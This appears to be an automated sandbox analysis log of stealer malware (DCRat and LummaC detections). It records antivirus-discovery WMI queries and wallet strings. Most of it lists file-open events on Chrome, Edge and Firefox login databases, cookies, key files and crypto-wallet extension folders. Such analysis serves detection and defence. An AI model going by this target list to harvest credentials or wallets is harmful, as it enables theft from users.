Source: Bypass.exe, 0000000F.00000002.4119735415.0000000002CB4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Users\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: Bypass.exe, 0000000F.00000002.4119735415.0000000002CB4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: eC:\Users\All Users\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: Bypass.exe, 0000000F.00000002.4119735415.00000000036B4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Users\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: Bypass.exe, 0000000F.00000002.4119735415.0000000002CB4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: TC:\Users\All Users\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: Bypass.exe, 0000000F.00000002.4119735415.0000000003E06000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Users\All Users\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: Bypass.exe, 0000000F.00000002.4119735415.0000000004ABF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Users\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: Bypass.exe, 0000000F.00000002.4119735415.000000000490D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Users\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: RegAsm.exe, 0000000D.00000002.1946222478.00000000014CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Bypass.exe, 0000000F.00000002.4119735415.0000000003E06000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Users\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: Bypass.exe, 0000000F.00000002.4119735415.0000000002CB4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Users\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected DCRat

Source: Yara match	File source: 0000000F.00000002.4119735415.0000000005AB7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4119735415.0000000005D5F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4119735415.0000000005BF2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4119735415.0000000005BC7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4119735415.0000000005AD8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4119735415.0000000005DB5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4119735415.0000000005C73000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4119735415.0000000005D8A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4119735415.0000000005C1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4119735415.0000000005CC8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Bypass.exe PID: 7004, type: MEMORYSTR
Source: Yara match	File source: 15.0.Bypass.exe.7f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000002.4119735415.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000000.1821021197.00000000007F2000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1818779277.0000021DBAF50000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 572stuOQ0pZG2Xj.exe PID: 6792, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\SoftwareDistribution\Bypass.exe, type: DROPPED

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Found many strings related to Crypto-Wallets (likely being stolen)

Source: RegAsm.exe, 0000000D.00000002.1948665208.00000000014FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum-LTC
Source: RegAsm.exe, 0000000D.00000002.1948665208.00000000014FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectronCash
Source: RegAsm.exe, 0000000D.00000002.1948665208.000000000153C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
Source: RegAsm.exe, 0000000D.00000002.1948665208.00000000014FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: RegAsm.exe, 0000000D.00000002.1948665208.00000000014FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: RegAsm.exe, 0000000D.00000002.1948665208.0000000001544000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Exodus
Source: RegAsm.exe, 0000000D.00000002.1946222478.000000000149B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum
Source: RegAsm.exe, 0000000D.00000002.1948665208.000000000153C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: RegAsm.exe, 0000000D.00000002.1948665208.0000000001544000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Local State
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Local State
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Microsoft\Edge\User Data\Default\Login Data
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Login Data
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite	Jump to behavior
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json	Jump to behavior
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
